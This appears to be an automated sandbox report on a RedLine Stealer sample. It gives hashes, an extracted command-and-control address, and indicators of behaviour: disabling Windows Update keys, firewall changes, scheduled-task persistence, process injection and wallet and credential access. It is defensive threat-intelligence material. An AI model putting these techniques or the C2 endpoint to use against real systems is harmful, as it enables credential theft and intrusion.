redline | 49deb035d46391e414506e10e5d394a9c371e61299fb5539e71e7bd830099f52

Analysis

max time kernel
151s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
25-10-2022 06:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

49DEB035D46391E414506E10E5D394A9C371E61299FB5.exe
Size

445KB
MD5

9ee68713f2a7cffe160e3fc1b446f61e
SHA1

1cd56f8a27c8913e1d8c4dd0c97acdeb0f2242ab
SHA256

49deb035d46391e414506e10e5d394a9c371e61299fb5539e71e7bd830099f52
SHA512

bc3a3e92b945d2a0e3c1737e0e3173ab8d16ad934f8c0eb76559819f83a6e70e40e1953328db89b5518faf0790cd9fcc04a059f04d011f5f5f5c22502b2db717
SSDEEP

6144:AnKmSDahq196R5aa7OuWigFV5zGlPAMTZSNiicyB7wbtLd4Fr351azS/PIAOr/Tu:FDL6Pv6zrzGlIMTZ+6taB3LazwPIV90

Score

10^/10

redline evasion infostealer spyware upx

Malware Config

Extracted

Family

redline

62.204.41.141:24758

Attributes

auth_value
ea069d64c780fc5379eeb0792909ac77

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral2/memory/100680-133-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline

Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs

description	pid	Process	procid_target
PID 101284 created 4212	101284	WerFault.exe	33
PID 101136 created 3352	101136	WerFault.exe	38
PID 57484 created 101016	57484	WerFault.exe	98

Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs

description	pid	Process	procid_target
PID 57472 created 604	57472	powershell.EXE	4
PID 57456 created 604	57456	powershell.EXE	4
PID 100716 created 4212	100716	svchost.exe	33
PID 100716 created 3352	100716	svchost.exe	38
PID 100716 created 55356	100716	svchost.exe	157
PID 100716 created 101016	100716	svchost.exe	98

Downloads MZ/PE file

Executes dropped EXE 7 IoCs

pid	Process
101364	ofg.exe
101016	test.exe
900	brave.exe
5000	chrome.exe
17696	GoogleUpdate.exe
57464	svcupdater.exe
57768	updater.exe

Modifies Windows Firewall 1 TTPs 3 IoCs

evasion

Modify Existing Service

T1031

pid	Process
72708	netsh.exe
72736	netsh.exe
69172	netsh.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0006000000022f7e-162.dat	upx
behavioral2/memory/900-168-0x00007FF760B10000-0x00007FF760FD1000-memory.dmp	upx
behavioral2/memory/900-207-0x00007FF760B10000-0x00007FF760FD1000-memory.dmp	upx
behavioral2/files/0x0006000000022f7e-235.dat	upx
behavioral2/memory/900-238-0x00007FF760B10000-0x00007FF760FD1000-memory.dmp	upx
behavioral2/files/0x0006000000022f8a-262.dat	upx
behavioral2/memory/57768-270-0x00007FF73CD70000-0x00007FF73D231000-memory.dmp	upx
behavioral2/files/0x0006000000022f8a-566.dat	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Drops file in System32 directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe

Suspicious use of SetThreadContext 8 IoCs

description	pid	Process	procid_target
PID 3904 set thread context of 100680	3904	49DEB035D46391E414506E10E5D394A9C371E61299FB5.exe	84
PID 5000 set thread context of 17696	5000	chrome.exe	108
PID 900 set thread context of 57324	900	brave.exe	139
PID 57472 set thread context of 57840	57472	powershell.EXE	149
PID 57456 set thread context of 57928	57456	powershell.EXE	150
PID 101016 set thread context of 55356	101016	test.exe	157
PID 57768 set thread context of 3392	57768	updater.exe	183
PID 57768 set thread context of 57744	57768	updater.exe	189

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	brave.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe

Drops file in Windows directory 5 IoCs

description	ioc	Process
File created	C:\Windows\GoogleUpdate.exe	chrome.exe
File created	C:\Windows\Tasks\dialersvc32.job	dialer.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	dialer.exe
File created	C:\Windows\Tasks\dialersvc64.job	dialer.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	dialer.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3836	sc.exe
88956	sc.exe
1580	sc.exe
101284	sc.exe
57044	sc.exe
57108	sc.exe
57132	sc.exe
57160	sc.exe
56976	sc.exe
55284	sc.exe

Program crash 6 IoCs

pid	pid_target	Process	procid_target
101000	3904	WerFault.exe	80
396	101016	WerFault.exe	98
4000	4212	WerFault.exe	33
57164	3352	WerFault.exe	38
57436	55356	WerFault.exe	157
57376	101016	WerFault.exe	98

Checks processor information in registry 2 TTPs 12 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
3676	schtasks.exe
4944	SCHTASKS.exe
16504	SCHTASKS.exe

Enumerates system info in registry 2 TTPs 8 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
100680	AppLaunch.exe
5044	powershell.exe
5044	powershell.exe
5044	powershell.exe
55136	powershell.exe
55136	powershell.exe
55384	powershell.exe
55384	powershell.exe
57336	powershell.exe
57472	powershell.EXE
57456	powershell.EXE
57336	powershell.exe
57472	powershell.EXE
57456	powershell.EXE
57472	powershell.EXE
57840	dllhost.exe
57840	dllhost.exe
57456	powershell.EXE
57928	dllhost.exe
57928	dllhost.exe
57928	dllhost.exe
57928	dllhost.exe
57928	dllhost.exe
57928	dllhost.exe
57928	dllhost.exe
57928	dllhost.exe
57928	dllhost.exe
57928	dllhost.exe
57928	dllhost.exe
57928	dllhost.exe
57840	dllhost.exe
57840	dllhost.exe
57928	dllhost.exe
57928	dllhost.exe
57928	dllhost.exe
57928	dllhost.exe
57840	dllhost.exe
57840	dllhost.exe
57928	dllhost.exe
57928	dllhost.exe
57840	dllhost.exe
57840	dllhost.exe
57928	dllhost.exe
57840	dllhost.exe
57840	dllhost.exe
57928	dllhost.exe
57928	dllhost.exe
57840	dllhost.exe
57840	dllhost.exe
57928	dllhost.exe
57928	dllhost.exe
57840	dllhost.exe
57840	dllhost.exe
57840	dllhost.exe
57840	dllhost.exe
57928	dllhost.exe
57928	dllhost.exe
57928	dllhost.exe
57840	dllhost.exe
57928	dllhost.exe
57840	dllhost.exe
57840	dllhost.exe
57840	dllhost.exe
57928	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3044	Explorer.EXE

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
652	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	100680	AppLaunch.exe
Token: SeDebugPrivilege	101364	ofg.exe
Token: SeDebugPrivilege	5044	powershell.exe
Token: SeDebugPrivilege	55136	powershell.exe
Token: SeDebugPrivilege	55384	powershell.exe
Token: SeShutdownPrivilege	56928	powercfg.exe
Token: SeCreatePagefilePrivilege	56928	powercfg.exe
Token: SeShutdownPrivilege	57004	powercfg.exe
Token: SeCreatePagefilePrivilege	57004	powercfg.exe
Token: SeShutdownPrivilege	57064	powercfg.exe
Token: SeCreatePagefilePrivilege	57064	powercfg.exe
Token: SeShutdownPrivilege	57096	powercfg.exe
Token: SeCreatePagefilePrivilege	57096	powercfg.exe
Token: SeIncreaseQuotaPrivilege	55384	powershell.exe
Token: SeSecurityPrivilege	55384	powershell.exe
Token: SeTakeOwnershipPrivilege	55384	powershell.exe
Token: SeLoadDriverPrivilege	55384	powershell.exe
Token: SeSystemProfilePrivilege	55384	powershell.exe
Token: SeSystemtimePrivilege	55384	powershell.exe
Token: SeProfSingleProcessPrivilege	55384	powershell.exe
Token: SeIncBasePriorityPrivilege	55384	powershell.exe
Token: SeCreatePagefilePrivilege	55384	powershell.exe
Token: SeBackupPrivilege	55384	powershell.exe
Token: SeRestorePrivilege	55384	powershell.exe
Token: SeShutdownPrivilege	55384	powershell.exe
Token: SeDebugPrivilege	55384	powershell.exe
Token: SeSystemEnvironmentPrivilege	55384	powershell.exe
Token: SeRemoteShutdownPrivilege	55384	powershell.exe
Token: SeUndockPrivilege	55384	powershell.exe
Token: SeManageVolumePrivilege	55384	powershell.exe
Token: 33	55384	powershell.exe
Token: 34	55384	powershell.exe
Token: 35	55384	powershell.exe
Token: 36	55384	powershell.exe
Token: SeIncreaseQuotaPrivilege	55384	powershell.exe
Token: SeSecurityPrivilege	55384	powershell.exe
Token: SeTakeOwnershipPrivilege	55384	powershell.exe
Token: SeLoadDriverPrivilege	55384	powershell.exe
Token: SeSystemProfilePrivilege	55384	powershell.exe
Token: SeSystemtimePrivilege	55384	powershell.exe
Token: SeProfSingleProcessPrivilege	55384	powershell.exe
Token: SeIncBasePriorityPrivilege	55384	powershell.exe
Token: SeCreatePagefilePrivilege	55384	powershell.exe
Token: SeBackupPrivilege	55384	powershell.exe
Token: SeRestorePrivilege	55384	powershell.exe
Token: SeShutdownPrivilege	55384	powershell.exe
Token: SeDebugPrivilege	55384	powershell.exe
Token: SeSystemEnvironmentPrivilege	55384	powershell.exe
Token: SeRemoteShutdownPrivilege	55384	powershell.exe
Token: SeUndockPrivilege	55384	powershell.exe
Token: SeManageVolumePrivilege	55384	powershell.exe
Token: 33	55384	powershell.exe
Token: 34	55384	powershell.exe
Token: 35	55384	powershell.exe
Token: 36	55384	powershell.exe
Token: SeIncreaseQuotaPrivilege	55384	powershell.exe
Token: SeSecurityPrivilege	55384	powershell.exe
Token: SeTakeOwnershipPrivilege	55384	powershell.exe
Token: SeLoadDriverPrivilege	55384	powershell.exe
Token: SeSystemProfilePrivilege	55384	powershell.exe
Token: SeSystemtimePrivilege	55384	powershell.exe
Token: SeProfSingleProcessPrivilege	55384	powershell.exe
Token: SeIncBasePriorityPrivilege	55384	powershell.exe
Token: SeCreatePagefilePrivilege	55384	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3904 wrote to memory of 100680	3904	49DEB035D46391E414506E10E5D394A9C371E61299FB5.exe	84
PID 3904 wrote to memory of 100680	3904	49DEB035D46391E414506E10E5D394A9C371E61299FB5.exe	84
PID 3904 wrote to memory of 100680	3904	49DEB035D46391E414506E10E5D394A9C371E61299FB5.exe	84
PID 3904 wrote to memory of 100680	3904	49DEB035D46391E414506E10E5D394A9C371E61299FB5.exe	84
PID 3904 wrote to memory of 100680	3904	49DEB035D46391E414506E10E5D394A9C371E61299FB5.exe	84
PID 100680 wrote to memory of 101364	100680	AppLaunch.exe	93
PID 100680 wrote to memory of 101364	100680	AppLaunch.exe	93
PID 101364 wrote to memory of 4388	101364	ofg.exe	94
PID 101364 wrote to memory of 4388	101364	ofg.exe	94
PID 4388 wrote to memory of 3676	4388	cmd.exe	97
PID 4388 wrote to memory of 3676	4388	cmd.exe	97
PID 100680 wrote to memory of 101016	100680	AppLaunch.exe	98
PID 100680 wrote to memory of 101016	100680	AppLaunch.exe	98
PID 100680 wrote to memory of 101016	100680	AppLaunch.exe	98
PID 100680 wrote to memory of 900	100680	AppLaunch.exe	102
PID 100680 wrote to memory of 900	100680	AppLaunch.exe	102
PID 100680 wrote to memory of 5000	100680	AppLaunch.exe	103
PID 100680 wrote to memory of 5000	100680	AppLaunch.exe	103
PID 100680 wrote to memory of 5000	100680	AppLaunch.exe	103
PID 5000 wrote to memory of 5044	5000	chrome.exe	104
PID 5000 wrote to memory of 5044	5000	chrome.exe	104
PID 5000 wrote to memory of 5044	5000	chrome.exe	104
PID 5000 wrote to memory of 4944	5000	chrome.exe	106
PID 5000 wrote to memory of 4944	5000	chrome.exe	106
PID 5000 wrote to memory of 4944	5000	chrome.exe	106
PID 5000 wrote to memory of 16504	5000	chrome.exe	109
PID 5000 wrote to memory of 16504	5000	chrome.exe	109
PID 5000 wrote to memory of 16504	5000	chrome.exe	109
PID 5000 wrote to memory of 17696	5000	chrome.exe	108
PID 5000 wrote to memory of 17696	5000	chrome.exe	108
PID 5000 wrote to memory of 17696	5000	chrome.exe	108
PID 5000 wrote to memory of 17696	5000	chrome.exe	108
PID 5000 wrote to memory of 17696	5000	chrome.exe	108
PID 5000 wrote to memory of 17696	5000	chrome.exe	108
PID 5000 wrote to memory of 17696	5000	chrome.exe	108
PID 5000 wrote to memory of 17696	5000	chrome.exe	108
PID 5000 wrote to memory of 17696	5000	chrome.exe	108
PID 17696 wrote to memory of 69172	17696	GoogleUpdate.exe	111
PID 17696 wrote to memory of 69172	17696	GoogleUpdate.exe	111
PID 17696 wrote to memory of 69172	17696	GoogleUpdate.exe	111
PID 17696 wrote to memory of 72708	17696	GoogleUpdate.exe	112
PID 17696 wrote to memory of 72708	17696	GoogleUpdate.exe	112
PID 17696 wrote to memory of 72708	17696	GoogleUpdate.exe	112
PID 17696 wrote to memory of 72736	17696	GoogleUpdate.exe	113
PID 17696 wrote to memory of 72736	17696	GoogleUpdate.exe	113
PID 17696 wrote to memory of 72736	17696	GoogleUpdate.exe	113
PID 900 wrote to memory of 55136	900	brave.exe	117
PID 900 wrote to memory of 55136	900	brave.exe	117
PID 900 wrote to memory of 55344	900	brave.exe	119
PID 900 wrote to memory of 55344	900	brave.exe	119
PID 900 wrote to memory of 55356	900	brave.exe	157
PID 900 wrote to memory of 55356	900	brave.exe	157
PID 900 wrote to memory of 55384	900	brave.exe	122
PID 900 wrote to memory of 55384	900	brave.exe	122
PID 55356 wrote to memory of 56928	55356	vbc.exe	125
PID 55356 wrote to memory of 56928	55356	vbc.exe	125
PID 55344 wrote to memory of 56976	55344	cmd.exe	126
PID 55344 wrote to memory of 56976	55344	cmd.exe	126
PID 55356 wrote to memory of 57004	55356	vbc.exe	127
PID 55356 wrote to memory of 57004	55356	vbc.exe	127
PID 55344 wrote to memory of 57044	55344	cmd.exe	128
PID 55344 wrote to memory of 57044	55344	cmd.exe	128
PID 55356 wrote to memory of 57064	55356	vbc.exe	129
PID 55356 wrote to memory of 57064	55356	vbc.exe	129

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:668

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:604
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:1020
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{659717a0-4206-4e52-bb9d-309acc481e14}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:57840
- C:\Windows\SysWOW64\dllhost.exe
  C:\Windows\SysWOW64\dllhost.exe /Processid:{7edd8805-2ac4-47d6-bf8f-49aade64d452}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:57928

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1228

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1172

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1276

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1400

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2324

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3520

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s W32Time
1⤵
PID:2096

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:3624

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:4996

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:4652

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:5108

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:4628

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:3708

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p
1⤵
PID:4180

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4832

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4212
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 4212 -s 392
  2⤵
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  PID:4000

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3840

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3352
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3352 -s 396
  2⤵
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  PID:57164

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3148

